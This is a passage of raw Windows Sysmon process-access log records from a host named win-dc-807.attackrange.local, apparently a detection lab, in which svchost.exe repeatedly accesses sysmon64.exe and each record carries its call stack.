l.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.096{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.094{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.093{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.093{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.027{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.003{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 